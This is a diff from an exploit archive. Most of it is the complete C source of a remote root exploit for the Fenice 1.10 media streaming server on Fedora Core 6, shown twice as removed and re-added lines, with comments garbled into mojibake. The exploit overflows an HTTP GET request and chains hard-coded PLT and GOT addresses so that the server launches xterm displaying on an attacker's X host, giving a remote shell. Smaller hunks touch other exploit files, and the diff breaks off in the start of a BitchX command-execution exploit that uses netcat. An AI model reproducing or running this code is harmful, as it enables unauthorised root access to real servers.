0x80591b5 // (execle()>>8)&0xff // bind ÇÔ¼öÀÇ 1byte: 0x00!!00 -#define EXECLE_00_0xff 0x8048e83 // (execle()>>0)&0xff // ³ª¸ÓÁö Á¤ÀûÀÎ 1byte: 0x0000!! - - -/* Á¤ÀûÀ¸·Î Á¢±Ù °¡´ÉÇÑ ¹öÆÛ°¡ ÀÖÀ» °æ¿ì, ÇÊ¿ä ¾øÀ½ */ -#define DATA_LOC 0x805af4c // heap ºó °ø°£À» ÀÌ¿ë - - -/* /usr/X11R6/bin/xterm */ -#define ARG1_LOC 0x805af4c // Á¶ÇÕµÈ ¸í·É ½ÃÀÛ ÁÖ¼Ò (argv[0],argv[1]·Î ¾²ÀÓ) -#define SLASH_STR 0x8055acb // "/" -#define XTERM_STR_1 0x804875d // "us" -#define XTERM_STR_2 0x80585ce // "r/" -#define X_STR_1 0x8048df3 // "X" -#define R_STR 0x804a572 // "R" -#define XTERM_STR_3 0x804882c // "bin" -#define X_STR_2 0x8048e33 // "x" -#define XTERM_STR_4 0x8056a33 // "term" - - -/* -display */ -#define ARG2_LOC 0x805af61 // Á¶ÇÕµÈ ¿É¼Ç ½ÃÀÛ ÁÖ¼Ò (argv[2]·Î ¾²ÀÓ) -#define DISPLAY_OPTION 0x80584b8 // "-di" - - -/* xhost_ip:0 */ -#define ARG3_LOC 0x805af65 // Á¶ÇÕµÈ xhost IP ½ÃÀÛ ÁÖ¼Ò (argv[3]À¸·Î ¾²ÀÓ) -#define NUM_0 0x8053285 // "0" -#define NUM_1 0x804ef17 // "1" -#define NUM_2 0x804b37b // "2" -#define NUM_3 0x804d622 // "3" -#define NUM_4 0x804e583 // "4" -#define NUM_5 0x80554d7 // "5" -#define NUM_6 0x8052341 // "6" -#define NUM_7 0x804d14a // "7" -#define NUM_8 0x8048db3 // "8" -#define NUM_9 0x80516bb // "9" - - -#define COLON_STR 0x8057abb // ":" -#define NULL_STR 0x805afbe // 0x00000000 - - -int main(int argc,char *argv[]){ - int i=0,j=0; - struct hostent *se; - struct sockaddr_in saddr; - unsigned long ip,ip1,ip2,ip3,ip4; - unsigned char do_ex[4096]; - unsigned char xhost_ip[256]; - int sock; - char host[256]; - int port=554; - - memset((char *)do_ex,0,sizeof(do_ex)); - ip=ip1=ip2=ip3=ip4; - - - printf("/*\n**\n** Fedora Core 6 (exec-shield) based\n" - "** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\n" - "** by Xpl017Elz\n**\n"); - if(argc<2){ - printf("** Usage: %s [host] [port] [xhost ip]\n",argv[0]); - printf("**\n** host: Fenice 1.10 Open Media Streaming Server\n"); - printf("** port: default 554\n"); - printf("** xhost ip: attacker xhost\n**\n"); - printf("** Example: %s fenice.omss.co.kr 554 82.82.82.82\n**\n*/\n",argv[0]); - exit(-1); - } - else { - sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); -#define IP1 16777216 -#define IP2 65536 -#define IP3 256 - ip=0; - ip+=ip1 * (IP1); - ip+=ip2 * (IP2); - ip+=ip3 * (IP3); - ip+=ip4; - - memset((char *)xhost_ip,0,256); - sprintf(xhost_ip,"%10lu",ip); - } - - memset((char *)host,0,sizeof(host)); - strncpy(host,argv[1],sizeof(host)-1); - port=atoi(argv[2]); - - se=gethostbyname(host); - if(se==NULL){ - printf("** gethostbyname() error\n**\n*/\n"); - return -1; - } - sock=socket(AF_INET,SOCK_STREAM,0); - if(sock==-1){ - printf("** socket() error\n**\n*/\n"); - return -1; - } - - saddr.sin_family=AF_INET; - saddr.sin_port=htons(port); - saddr.sin_addr=*((struct in_addr *)se->h_addr); - bzero(&(saddr.sin_zero),8); - - - printf("** make exploit\n"); - sprintf(do_ex,"GET /"); - j=strlen(do_ex); - for(i=0;i<320;i++,j++){ - sprintf(do_ex+j,"A"); - } - -#define __GOGOSSING(dest,index,src){\ - *(long *)&dest[index]=src;\ - index+=4;\ -} - - __GOGOSSING(do_ex,j,UNAME_PLT); /* uname GOT °ª ä¿ò */ - // execle() ÁÖ¼Ò Á¶ÇÕ - { - i=0; - /* (execle()>>0)&0xff */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,GETGID_GOT+i++); - __GOGOSSING(do_ex,j,EXECLE_00_0xff); - /* (execle()>>8)&0xff */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,GETGID_GOT+i++); - __GOGOSSING(do_ex,j,EXECLE_08_0xff); - /* (execle()>>16)&0xff */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,GETGID_GOT+i++); - __GOGOSSING(do_ex,j,EXECLE_16_0xff); - } - // argv[0],argv[1]: /usr/X11R6/bin/xterm - { - i=0; - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,SLASH_STR); - i+=1; /* "/" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,XTERM_STR_1); - i+=2; /* "us" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,XTERM_STR_2); - i+=2; /* "r/" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,X_STR_1); - i+=1; /* "X" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NUM_1); - i+=1; /* "1" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NUM_1); - i+=1; /* "1" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,R_STR); - i+=1; /* "R" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NUM_6); - i+=1; /* "6" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,SLASH_STR); - i+=1; /* "/" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,XTERM_STR_3); - i+=3; /* "bin" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,SLASH_STR); - i+=1; /* "/" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,X_STR_2); - i+=1; /* "x" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,XTERM_STR_4); - i+=4; /* "term" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NULL_STR); - i+=1; /* null */ - } - // argv[2]: -display - { - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,DISPLAY_OPTION); - i+=3; /* "-di" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NULL_STR); - i+=1; /* null */ - } - // argv[3]: xhost_ip:0 - for(ip=0;ip<10;ip++){ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - - switch(xhost_ip[ip]){ - case '0': - __GOGOSSING(do_ex,j,NUM_0); - break; - case '1': - __GOGOSSING(do_ex,j,NUM_1); - break; - case '2': - __GOGOSSING(do_ex,j,NUM_2); - break; - case '3': - __GOGOSSING(do_ex,j,NUM_3); - break; - case '4': - __GOGOSSING(do_ex,j,NUM_4); - break; - case '5': - __GOGOSSING(do_ex,j,NUM_5); - break; - case '6': - __GOGOSSING(do_ex,j,NUM_6); - break; - case '7': - __GOGOSSING(do_ex,j,NUM_7); - break; - case '8': - __GOGOSSING(do_ex,j,NUM_8); - break; - case '9': - __GOGOSSING(do_ex,j,NUM_9); - break; - } - i+=1; - } - { - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,COLON_STR); - i+=1; /* ":" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NUM_0); - i+=1; /* "0" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NULL_STR); - i+=1; /* null */ - } - // exploit - { - __GOGOSSING(do_ex,j,GETGID_PLT); // getgidÀÇ GOT´Â execle() ÇÔ¼ö¸¦ °¡Áö¹Ç·Î, PLT·Î Çڵ鸵 °¡´É. - __GOGOSSING(do_ex,j,0x82828282); // callÀÌ ¾Æ´Ï¹Ç·Î, ÀÌÀü ÇÔ¼ö %eip¸¦ ´ë½ÅÇؼ­ ä¿ò. - __GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */ - __GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */ - __GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */ - __GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */ - } - printf("** exploit size: %d\n",strlen(do_ex)); - - i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr)); - if(i==-1){ - printf("** connect() error\n**\n*/\n"); - return -1; - } - else { - printf("** send exploit\n"); - send(sock,do_ex,j,0); - - printf("** sleepppppppp...\n"); - sleep(1); - send(sock,"\n",1,0); - send(sock,"\n",1,0); - } - close(sock); - - printf("** xhost, check it up, now!\n**\n*/\n"); - exit(0); -} - -/* eoc */ - -// milw0rm.com [2007-04-29] +/* +** +** Fedora Core 6 (exec-shield) based +** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit +** by Xpl017Elz +** +** Advanced exploitation in exec-shield (Fedora Core case study) +** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt +** +** Reference: http://www.securityfocus.com/bid/17678 +** vendor: http://streaming.polito.it/legacy_server +** +** -- +** exploit by "you dong-hun"(Xpl017Elz), . +** My World: http://x82.inetcop.org +** +*/ +/* +** -=-= POINT! POINT! POINT! POINT! POINT! =-=- +** +** This is a very common standalone daemon remote buffer overflow vulnerability. +** I used the method that I used on my proftpd exploit again to avoid random mapping library. +** And I'm plainning to publish it in English. +** +** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt +** +** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more. +** +*/ + +#include +#include +#include +#include +#include +#include + + +#define UNAME_PLT 0x8048e9c // // randomÇÏ°Ô mappingµÇ´Â (execle()>>16)&0xff GOT 1byte¸¦ È®º¸Çϱâ À§ÇØ + +#define STRCPY_PLT 0x08048ffc // +#define MOVE_ESP 0x80569e5 // <__do_global_ctors_aux+37>: pop %ebx // retÀ» Æ÷ÇÔ ÃÑ 12byte À̵¿ (nergal's idea) + +#define GETGID_GOT 0x8059234 // execle() ÇÔ¼ö ÁÖ¼Ò¸¦ ÀÓÀÇ·Î Á¶ÇÕÇÏ¿© ³ÖÀ» GOT ÁÖ¼Ò +/* + (gdb) x/x 0x8059234 + 0x8059234 <_GLOBAL_OFFSET_TABLE_+324>: 0x08049222 + (gdb) x 0x08049222 + 0x8049222 : 0x00027068 + (gdb) +*/ +#define GETGID_PLT 0x0804921c // // GOT Á¶ÇÕ ÀÌÈÄ, PLT¸¦ ÅëÇØ execle() ÇÔ¼ö Çڵ鸵 + + +#define EXECLE_16_0xff 0x8059156 // (execle()>>16)&0xff // uname ÇÔ¼öÀÇ 1byte: 0x!!0000 +#define EXECLE_08_0xff 0x80591b5 // (execle()>>8)&0xff // bind ÇÔ¼öÀÇ 1byte: 0x00!!00 +#define EXECLE_00_0xff 0x8048e83 // (execle()>>0)&0xff // ³ª¸ÓÁö Á¤ÀûÀÎ 1byte: 0x0000!! + + +/* Á¤ÀûÀ¸·Î Á¢±Ù °¡´ÉÇÑ ¹öÆÛ°¡ ÀÖÀ» °æ¿ì, ÇÊ¿ä ¾øÀ½ */ +#define DATA_LOC 0x805af4c // heap ºó °ø°£À» ÀÌ¿ë + + +/* /usr/X11R6/bin/xterm */ +#define ARG1_LOC 0x805af4c // Á¶ÇÕµÈ ¸í·É ½ÃÀÛ ÁÖ¼Ò (argv[0],argv[1]·Î ¾²ÀÓ) +#define SLASH_STR 0x8055acb // "/" +#define XTERM_STR_1 0x804875d // "us" +#define XTERM_STR_2 0x80585ce // "r/" +#define X_STR_1 0x8048df3 // "X" +#define R_STR 0x804a572 // "R" +#define XTERM_STR_3 0x804882c // "bin" +#define X_STR_2 0x8048e33 // "x" +#define XTERM_STR_4 0x8056a33 // "term" + + +/* -display */ +#define ARG2_LOC 0x805af61 // Á¶ÇÕµÈ ¿É¼Ç ½ÃÀÛ ÁÖ¼Ò (argv[2]·Î ¾²ÀÓ) +#define DISPLAY_OPTION 0x80584b8 // "-di" + + +/* xhost_ip:0 */ +#define ARG3_LOC 0x805af65 // Á¶ÇÕµÈ xhost IP ½ÃÀÛ ÁÖ¼Ò (argv[3]À¸·Î ¾²ÀÓ) +#define NUM_0 0x8053285 // "0" +#define NUM_1 0x804ef17 // "1" +#define NUM_2 0x804b37b // "2" +#define NUM_3 0x804d622 // "3" +#define NUM_4 0x804e583 // "4" +#define NUM_5 0x80554d7 // "5" +#define NUM_6 0x8052341 // "6" +#define NUM_7 0x804d14a // "7" +#define NUM_8 0x8048db3 // "8" +#define NUM_9 0x80516bb // "9" + + +#define COLON_STR 0x8057abb // ":" +#define NULL_STR 0x805afbe // 0x00000000 + + +int main(int argc,char *argv[]){ + int i=0,j=0; + struct hostent *se; + struct sockaddr_in saddr; + unsigned long ip,ip1,ip2,ip3,ip4; + unsigned char do_ex[4096]; + unsigned char xhost_ip[256]; + int sock; + char host[256]; + int port=554; + + memset((char *)do_ex,0,sizeof(do_ex)); + ip=ip1=ip2=ip3=ip4; + + + printf("/*\n**\n** Fedora Core 6 (exec-shield) based\n" + "** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\n" + "** by Xpl017Elz\n**\n"); + if(argc<2){ + printf("** Usage: %s [host] [port] [xhost ip]\n",argv[0]); + printf("**\n** host: Fenice 1.10 Open Media Streaming Server\n"); + printf("** port: default 554\n"); + printf("** xhost ip: attacker xhost\n**\n"); + printf("** Example: %s fenice.omss.co.kr 554 82.82.82.82\n**\n*/\n",argv[0]); + exit(-1); + } + else { + sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); +#define IP1 16777216 +#define IP2 65536 +#define IP3 256 + ip=0; + ip+=ip1 * (IP1); + ip+=ip2 * (IP2); + ip+=ip3 * (IP3); + ip+=ip4; + + memset((char *)xhost_ip,0,256); + sprintf(xhost_ip,"%10lu",ip); + } + + memset((char *)host,0,sizeof(host)); + strncpy(host,argv[1],sizeof(host)-1); + port=atoi(argv[2]); + + se=gethostbyname(host); + if(se==NULL){ + printf("** gethostbyname() error\n**\n*/\n"); + return -1; + } + sock=socket(AF_INET,SOCK_STREAM,0); + if(sock==-1){ + printf("** socket() error\n**\n*/\n"); + return -1; + } + + saddr.sin_family=AF_INET; + saddr.sin_port=htons(port); + saddr.sin_addr=*((struct in_addr *)se->h_addr); + bzero(&(saddr.sin_zero),8); + + + printf("** make exploit\n"); + sprintf(do_ex,"GET /"); + j=strlen(do_ex); + for(i=0;i<320;i++,j++){ + sprintf(do_ex+j,"A"); + } + +#define __GOGOSSING(dest,index,src){\ + *(long *)&dest[index]=src;\ + index+=4;\ +} + + __GOGOSSING(do_ex,j,UNAME_PLT); /* uname GOT °ª ä¿ò */ + // execle() ÁÖ¼Ò Á¶ÇÕ + { + i=0; + /* (execle()>>0)&0xff */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,GETGID_GOT+i++); + __GOGOSSING(do_ex,j,EXECLE_00_0xff); + /* (execle()>>8)&0xff */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,GETGID_GOT+i++); + __GOGOSSING(do_ex,j,EXECLE_08_0xff); + /* (execle()>>16)&0xff */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,GETGID_GOT+i++); + __GOGOSSING(do_ex,j,EXECLE_16_0xff); + } + // argv[0],argv[1]: /usr/X11R6/bin/xterm + { + i=0; + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,SLASH_STR); + i+=1; /* "/" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,XTERM_STR_1); + i+=2; /* "us" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,XTERM_STR_2); + i+=2; /* "r/" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,X_STR_1); + i+=1; /* "X" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NUM_1); + i+=1; /* "1" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NUM_1); + i+=1; /* "1" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,R_STR); + i+=1; /* "R" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NUM_6); + i+=1; /* "6" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,SLASH_STR); + i+=1; /* "/" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,XTERM_STR_3); + i+=3; /* "bin" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,SLASH_STR); + i+=1; /* "/" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,X_STR_2); + i+=1; /* "x" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,XTERM_STR_4); + i+=4; /* "term" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NULL_STR); + i+=1; /* null */ + } + // argv[2]: -display + { + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,DISPLAY_OPTION); + i+=3; /* "-di" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NULL_STR); + i+=1; /* null */ + } + // argv[3]: xhost_ip:0 + for(ip=0;ip<10;ip++){ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + + switch(xhost_ip[ip]){ + case '0': + __GOGOSSING(do_ex,j,NUM_0); + break; + case '1': + __GOGOSSING(do_ex,j,NUM_1); + break; + case '2': + __GOGOSSING(do_ex,j,NUM_2); + break; + case '3': + __GOGOSSING(do_ex,j,NUM_3); + break; + case '4': + __GOGOSSING(do_ex,j,NUM_4); + break; + case '5': + __GOGOSSING(do_ex,j,NUM_5); + break; + case '6': + __GOGOSSING(do_ex,j,NUM_6); + break; + case '7': + __GOGOSSING(do_ex,j,NUM_7); + break; + case '8': + __GOGOSSING(do_ex,j,NUM_8); + break; + case '9': + __GOGOSSING(do_ex,j,NUM_9); + break; + } + i+=1; + } + { + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,COLON_STR); + i+=1; /* ":" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NUM_0); + i+=1; /* "0" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NULL_STR); + i+=1; /* null */ + } + // exploit + { + __GOGOSSING(do_ex,j,GETGID_PLT); // getgidÀÇ GOT´Â execle() ÇÔ¼ö¸¦ °¡Áö¹Ç·Î, PLT·Î Çڵ鸵 °¡´É. + __GOGOSSING(do_ex,j,0x82828282); // callÀÌ ¾Æ´Ï¹Ç·Î, ÀÌÀü ÇÔ¼ö %eip¸¦ ´ë½ÅÇؼ­ ä¿ò. + __GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */ + __GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */ + __GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */ + __GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */ + } + printf("** exploit size: %d\n",strlen(do_ex)); + + i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr)); + if(i==-1){ + printf("** connect() error\n**\n*/\n"); + return -1; + } + else { + printf("** send exploit\n"); + send(sock,do_ex,j,0); + + printf("** sleepppppppp...\n"); + sleep(1); + send(sock,"\n",1,0); + send(sock,"\n",1,0); + } + close(sock); + + printf("** xhost, check it up, now!\n**\n*/\n"); + exit(0); +} + +/* eoc */ + +// milw0rm.com [2007-04-29] diff --git a/platforms/linux/remote/382.c b/platforms/linux/remote/382.c index 177957f39..a12549520 100755 --- a/platforms/linux/remote/382.c +++ b/platforms/linux/remote/382.c @@ -87,6 +87,6 @@ NICKNAME\n",host,port,jump,sizeof(nick)-6); } else printf("Can't connect to %s at %d\n",host,port),exit(1); } -} - -// milw0rm.com [2002-12-24] +} + +// milw0rm.com [2002-12-24] diff --git a/platforms/linux/remote/386.c b/platforms/linux/remote/386.c index 0c5d86b12..b58660059 100755 --- a/platforms/linux/remote/386.c +++ b/platforms/linux/remote/386.c @@ -497,6 +497,6 @@ jumpout: banner(); example(exploit); return EXIT_FAILURE; -} - -// milw0rm.com [2004-08-09] +} + +// milw0rm.com [2004-08-09] diff --git a/platforms/linux/remote/387.c b/platforms/linux/remote/387.c index 8b20433ff..595c7cff8 100755 --- a/platforms/linux/remote/387.c +++ b/platforms/linux/remote/387.c @@ -239,6 +239,6 @@ usage(const char *progname) { fprintf(stderr, "coded by livenn"); fprintf(stderr, "Usage: %s [-l ] [-r ]" " [-v ] n", progname); -} - -// milw0rm.com [2004-08-09] +} + +// milw0rm.com [2004-08-09] diff --git a/platforms/linux/remote/389.c b/platforms/linux/remote/389.c index d28226216..1c0c6250c 100755 --- a/platforms/linux/remote/389.c +++ b/platforms/linux/remote/389.c @@ -151,6 +151,6 @@ int main(int argc, char **argv) close(fd); return 0; -} - -// milw0rm.com [2004-08-11] +} + +// milw0rm.com [2004-08-11] diff --git a/platforms/linux/remote/39.c b/platforms/linux/remote/39.c index d36e69663..dd327ad16 100755 --- a/platforms/linux/remote/39.c +++ b/platforms/linux/remote/39.c @@ -322,6 +322,6 @@ int main(int argc, char *argv[]) return 1 ; } - - -// milw0rm.com [2003-06-10] + + +// milw0rm.com [2003-06-10] diff --git a/platforms/linux/remote/390.c b/platforms/linux/remote/390.c index d4817a32f..53634cba1 100755 --- a/platforms/linux/remote/390.c +++ b/platforms/linux/remote/390.c @@ -78,6 +78,6 @@ int main(int argc, char **argv) close(fd); return 0; -} - -// milw0rm.com [2004-08-13] +} + +// milw0rm.com [2004-08-13] diff --git a/platforms/linux/remote/397.c b/platforms/linux/remote/397.c index c2d6f33be..8d231feba 100755 --- a/platforms/linux/remote/397.c +++ b/platforms/linux/remote/397.c @@ -149,6 +149,6 @@ int main(int argc, char *argv[]) return; } - - -// milw0rm.com [2002-06-25] + + +// milw0rm.com [2002-06-25] diff --git a/platforms/linux/remote/398.c b/platforms/linux/remote/398.c index 787b9f4bb..7adedbf89 100755 --- a/platforms/linux/remote/398.c +++ b/platforms/linux/remote/398.c @@ -356,6 +356,6 @@ handleshell(int closeme, int s) fprintf(stderr, "%s", in); } } -} - -// milw0rm.com [2002-01-01] +} + +// milw0rm.com [2002-01-01] diff --git a/platforms/linux/remote/399.c b/platforms/linux/remote/399.c index 9e57ce07a..62c5f290c 100755 --- a/platforms/linux/remote/399.c +++ b/platforms/linux/remote/399.c @@ -432,6 +432,6 @@ handleshell(int closeme, int s) fprintf(stderr, "%s", in); } } -} - -// milw0rm.com [2002-01-01] +} + +// milw0rm.com [2002-01-01] diff --git a/platforms/linux/remote/405.c b/platforms/linux/remote/405.c index 0d46db483..dff8165c7 100755 --- a/platforms/linux/remote/405.c +++ b/platforms/linux/remote/405.c @@ -146,6 +146,6 @@ int main(int argc, char **argv) return 0; -} - -// milw0rm.com [2004-08-20] +} + +// milw0rm.com [2004-08-20] diff --git a/platforms/linux/remote/408.c b/platforms/linux/remote/408.c index 744b4883a..3e7e4e0fa 100755 --- a/platforms/linux/remote/408.c +++ b/platforms/linux/remote/408.c @@ -168,6 +168,6 @@ int main(int argc, char **argv) make_bmp(buf, len); return 0; } - - -// milw0rm.com [2004-08-21] + + +// milw0rm.com [2004-08-21] diff --git a/platforms/linux/remote/4087.c b/platforms/linux/remote/4087.c index 7ae8c1b85..448dd7cd3 100755 --- a/platforms/linux/remote/4087.c +++ b/platforms/linux/remote/4087.c @@ -1,158 +1,158 @@ -/* Name: PBXS - Pointless BitchX Sploit - * Author: clarity_ - * Infected Versions: 1.1-final and others? - * Synopsis: BitchX suffers from a unchecked bounds in a hash table in hook.c where one - * can inject data structures allowing for the remote execution of commands! - * Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx - * version connects to the mischievous server "ps -aux" will be executed. - * Shout Outs: solomon, crypt1, vortek, ziri, and all the other niggaz at svun @ undernet - */ - -// Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org -#define HOOK_FUNCTIONS 0x81366e0 -#define NICKNAME 0x8155353 -#define STAR 0x8108f34 - -#include -#include -#include - -#define NICK_STR ":bleh!i" -#define NICK_STR2 "@svun.powns.net NICK :" -#define EXEC_STR "EXEC $1-" -#define RAW_FMT_STR ":my_server -%u bleh 